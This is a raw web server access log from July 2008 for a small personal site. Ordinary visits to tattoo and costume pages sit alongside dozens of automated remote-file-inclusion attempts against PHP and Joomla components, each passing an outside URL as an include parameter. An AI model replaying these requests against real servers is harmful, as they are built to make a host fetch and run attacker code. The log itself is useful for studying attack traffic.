80.93.62.99 - - [10/Jul/2008:22:16:51 -0500] "GET /logs//errors.php?error=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
80.93.62.99 - - [10/Jul/2008:22:16:51 -0500] "GET //errors.php?error=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
78.137.163.133 - - [10/Jul/2008:22:17:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
78.137.163.133 - - [10/Jul/2008:22:17:25 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
78.137.163.133 - - [10/Jul/2008:22:17:25 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
78.137.163.133 - - [10/Jul/2008:22:17:25 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
78.137.163.133 - - [10/Jul/2008:22:17:25 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
78.137.163.133 - - [10/Jul/2008:22:17:26 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
78.137.163.133 - - [10/Jul/2008:22:17:26 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
217.20.163.130 - - [10/Jul/2008:22:17:42 -0500] "GET /logs/atom.php5?page=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
217.20.163.130 - - [10/Jul/2008:22:17:42 -0500] "GET /atom.php5?page=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
64.202.126.170 - - [10/Jul/2008:22:19:05 -0500] "GET /logs/access_log.1207785600//faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
64.202.126.170 - - [10/Jul/2008:22:19:05 -0500] "GET //faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
64.202.126.170 - - [10/Jul/2008:22:19:06 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
205.234.232.68 - - [10/Jul/2008:22:20:11 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
205.234.232.68 - - [10/Jul/2008:22:20:11 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
66.225.192.5 - - [10/Jul/2008:22:20:48 -0500] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
66.225.192.5 - - [10/Jul/2008:22:20:48 -0500] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
210.245.87.117 - - [10/Jul/2008:22:21:26 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/anakbotol/id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
210.245.87.117 - - [10/Jul/2008:22:21:26 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/anakbotol/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
87.118.114.47 - - [10/Jul/2008:22:22:05 -0500] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vogtland-korna.de/templates/id.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
87.118.114.47 - - [10/Jul/2008:22:22:05 -0500] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vogtland-korna.de/templates/id.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
87.118.114.47 - - [10/Jul/2008:22:22:07 -0500] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vogtland-korna.de/templates/id.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
87.118.114.47 - - [10/Jul/2008:22:22:08 -0500] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vogtland-korna.de/templates/id.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
194.143.183.8 - - [10/Jul/2008:22:22:24 -0500] "GET /logs//errors.php?error=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
194.143.183.8 - - [10/Jul/2008:22:22:25 -0500] "GET //errors.php?error=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
193.254.184.51 - - [10/Jul/2008:22:27:05 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.1" 404 314 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
193.254.184.51 - - [10/Jul/2008:22:27:05 -0500] "GET /logs/errors.php?error=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.1" 404 299 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
193.254.184.51 - - [10/Jul/2008:22:27:05 -0500] "GET //skin/zero_vote/error.php?dir=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.1" 404 309 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
193.254.184.51 - - [10/Jul/2008:22:27:06 -0500] "GET /errors.php?error=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.1" 404 294 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
216.246.1.115 - - [10/Jul/2008:22:27:14 -0500] "GET /logs//errors.php?error=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
216.246.1.115 - - [10/Jul/2008:22:27:14 -0500] "GET //errors.php?error=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
87.239.10.63 - - [10/Jul/2008:22:27:25 -0500] "GET /logs//errors.php?error=http://medisana.co.kr/test?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.239.10.63 - - [10/Jul/2008:22:27:25 -0500] "GET //errors.php?error=http://medisana.co.kr/test?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.225.246.47 - - [10/Jul/2008:22:27:30 -0500] "GET /logs//errors.php?error=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
66.225.246.47 - - [10/Jul/2008:22:27:30 -0500] "GET //errors.php?error=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
83.98.156.151 - - [10/Jul/2008:22:28:33 -0500] "GET /!scanhttp://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
83.98.156.151 - - [10/Jul/2008:22:28:33 -0500] "GET /logs/!scanhttp://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
217.160.200.228 - - [10/Jul/2008:22:31:59 -0500] "GET /logs//errors.php?error=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
217.160.200.228 - - [10/Jul/2008:22:31:59 -0500] "GET //errors.php?error=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
87.239.10.63 - - [10/Jul/2008:22:32:09 -0500] "GET /logs//errors.php?error=http://medisana.co.kr/test?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.239.10.63 - - [10/Jul/2008:22:32:09 -0500] "GET //errors.php?error=http://medisana.co.kr/test?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
78.137.163.133 - - [10/Jul/2008:22:37:14 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
78.137.163.133 - - [10/Jul/2008:22:37:15 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
74.6.8.88 - - [10/Jul/2008:22:39:34 -0500] "GET /logs/access_log.1187395200 HTTP/1.0" 200 84354 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
122.161.14.229 - - [10/Jul/2008:22:41:22 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:41:26 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:41:26 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:41:41 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:41:42 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:42:16 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:42:24 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:42:40 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:43:22 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:43:24 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
116.125.113.115 - - [10/Jul/2008:22:43:34 -0500] "GET /logs/access_log.1207785600//faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
116.125.113.115 - - [10/Jul/2008:22:43:34 -0500] "GET //faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
116.125.113.115 - - [10/Jul/2008:22:43:35 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
122.161.14.229 - - [10/Jul/2008:22:43:37 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:43:41 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:43:50 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:43:56 -0500] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:44:01 -0500] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
83.98.156.151 - - [10/Jul/2008:22:44:01 -0500] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
83.98.156.151 - - [10/Jul/2008:22:44:01 -0500] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
122.161.14.229 - - [10/Jul/2008:22:44:11 -0500] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:44:18 -0500] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:44:21 -0500] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:45:56 -0500] "GET /costume/costume2.htm HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:45:58 -0500] "GET /costume/thmb5.htm HTTP/1.1" 200 2921 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:45:59 -0500] "GET /costume/costume49%20copy.JPG HTTP/1.1" 200 16898 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.98.250.45 - - [10/Jul/2008:22:46:02 -0500] "GET /logs/%22errors.php?error%22.co.auhttp://www.elektropoechhacker.at/mambo/bajo.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
122.161.14.229 - - [10/Jul/2008:22:46:02 -0500] "GET /costume/costm50.jpg HTTP/1.1" 200 53503 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.98.250.45 - - [10/Jul/2008:22:46:02 -0500] "GET /%22errors.php?error%22.co.auhttp://www.elektropoechhacker.at/mambo/bajo.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
122.161.14.229 - - [10/Jul/2008:22:46:04 -0500] "GET /costume/costume51%20copy.JPG HTTP/1.1" 200 16648 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:46:12 -0500] "GET /costume/costume52%20copy.JPG HTTP/1.1" 200 16497 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:46:12 -0500] "GET /costume/costume55%20copy.JPG HTTP/1.1" 200 16737 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:46:17 -0500] "GET /costume/costume54%20copy.JPG HTTP/1.1" 200 16716 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:46:17 -0500] "GET /costume/costume53%20copy.JPG HTTP/1.1" 200 16962 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:46:21 -0500] "GET /costume/costume57%20copy.JPG HTTP/1.1" 200 16878 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:46:24 -0500] "GET /costume/costume56%20copy.JPG HTTP/1.1" 200 16276 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:46:26 -0500] "GET /costume/costume59%20copy.JPG HTTP/1.1" 200 15800 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.161.14.229 - - [10/Jul/2008:22:46:29 -0500] "GET /costume/costume58%20copy.JPG HTTP/1.1" 200 16381 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.174.82.130 - - [10/Jul/2008:22:46:33 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
202.174.82.130 - - [10/Jul/2008:22:46:33 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
122.161.14.229 - - [10/Jul/2008:22:46:36 -0500] "GET /costume/costume60.JPG HTTP/1.1" 200 56431 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
83.98.156.151 - - [10/Jul/2008:22:46:57 -0500] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
83.98.156.151 - - [10/Jul/2008:22:46:57 -0500] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
202.174.82.130 - - [10/Jul/2008:22:47:25 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
202.174.82.130 - - [10/Jul/2008:22:47:25 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
211.20.85.150 - - [10/Jul/2008:22:50:52 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
72.55.179.18 - - [10/Jul/2008:22:51:04 -0500] "GET /logs/admin.php?include_path=http://minezota.com.mx/chicas/lang/lang.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.179.18 - - [10/Jul/2008:22:51:04 -0500] "GET /admin.php?include_path=http://minezota.com.mx/chicas/lang/lang.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
202.174.84.65 - - [10/Jul/2008:22:51:32 -0500] "GET /logs/access_log.1179705600/page1.php?pg=http://creativ-s.ru/tmp/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
202.174.84.65 - - [10/Jul/2008:22:51:32 -0500] "GET /logs/access_log.1179705600/page1.php?pg=http://creativ-s.ru/tmp/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
202.174.84.65 - - [10/Jul/2008:22:51:32 -0500] "GET /page1.php?pg=http://creativ-s.ru/tmp/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
202.174.84.65 - - [10/Jul/2008:22:51:32 -0500] "GET /page1.php?pg=http://creativ-s.ru/tmp/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
202.174.84.65 - - [10/Jul/2008:22:51:33 -0500] "GET /logs/page1.php?pg=http://creativ-s.ru/tmp/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
202.174.84.65 - - [10/Jul/2008:22:51:33 -0500] "GET /logs/page1.php?pg=http://creativ-s.ru/tmp/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
66.98.250.45 - - [10/Jul/2008:23:01:42 -0500] "GET /logs/%22/com_smf%22http://www.elektropoechhacker.at/mambo/bajo.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.65"
66.98.250.45 - - [10/Jul/2008:23:01:42 -0500] "GET /%22/com_smf%22http://www.elektropoechhacker.at/mambo/bajo.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.65"
207.7.108.242 - - [10/Jul/2008:23:05:35 -0500] "GET /logs/send_reminders.php?includedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
207.7.108.242 - - [10/Jul/2008:23:05:35 -0500] "GET /logs/send_reminders.php?includedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
207.7.108.242 - - [10/Jul/2008:23:05:35 -0500] "GET /send_reminders.php?includedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
207.7.108.242 - - [10/Jul/2008:23:05:36 -0500] "GET /send_reminders.php?includedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
59.126.172.166 - - [10/Jul/2008:23:07:28 -0500] "GET /logs/%22errors.php?error%22.co.auhttp://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
59.126.172.166 - - [10/Jul/2008:23:07:29 -0500] "GET /%22errors.php?error%22.co.auhttp://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
59.126.172.166 - - [10/Jul/2008:23:08:14 -0500] "GET /logs/%22/com_smf%22http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
59.126.172.166 - - [10/Jul/2008:23:08:20 -0500] "GET /%22/com_smf%22http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
216.246.1.115 - - [10/Jul/2008:23:09:58 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.811"
216.246.1.115 - - [10/Jul/2008:23:09:58 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.811"
66.225.246.47 - - [10/Jul/2008:23:10:06 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.810"
66.225.246.47 - - [10/Jul/2008:23:10:06 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
83.98.156.151 - - [10/Jul/2008:23:12:06 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
83.98.156.151 - - [10/Jul/2008:23:12:06 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
62.116.36.2 - - [10/Jul/2008:23:12:33 -0500] "GET /logs//common.class.php?mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
62.116.36.2 - - [10/Jul/2008:23:12:33 -0500] "GET //common.class.php?mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
217.160.200.228 - - [10/Jul/2008:23:15:00 -0500] "GET /logs/%22errors.php?error%22.co.auhttp://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
217.160.200.228 - - [10/Jul/2008:23:15:00 -0500] "GET /%22errors.php?error%22.co.auhttp://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
80.93.62.99 - - [10/Jul/2008:23:19:10 -0500] "GET /logs/%22/com_smf%22http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
80.93.62.99 - - [10/Jul/2008:23:19:10 -0500] "GET /%22/com_smf%22http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
194.151.202.2 - - [10/Jul/2008:23:21:50 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
194.151.202.2 - - [10/Jul/2008:23:21:50 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
194.151.202.2 - - [10/Jul/2008:23:21:51 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
194.151.202.2 - - [10/Jul/2008:23:21:52 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.138.159.164 - - [10/Jul/2008:23:22:21 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.138.159.164 - - [10/Jul/2008:23:22:22 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
194.143.183.8 - - [10/Jul/2008:23:23:54 -0500] "GET /logs/%22errors.php?error%22.co.auhttp://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
194.143.183.8 - - [10/Jul/2008:23:23:55 -0500] "GET /%22errors.php?error%22.co.auhttp://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
217.160.200.228 - - [10/Jul/2008:23:24:46 -0500] "GET /logs/%22/com_smf%22http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
217.160.200.228 - - [10/Jul/2008:23:24:46 -0500] "GET /%22/com_smf%22http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
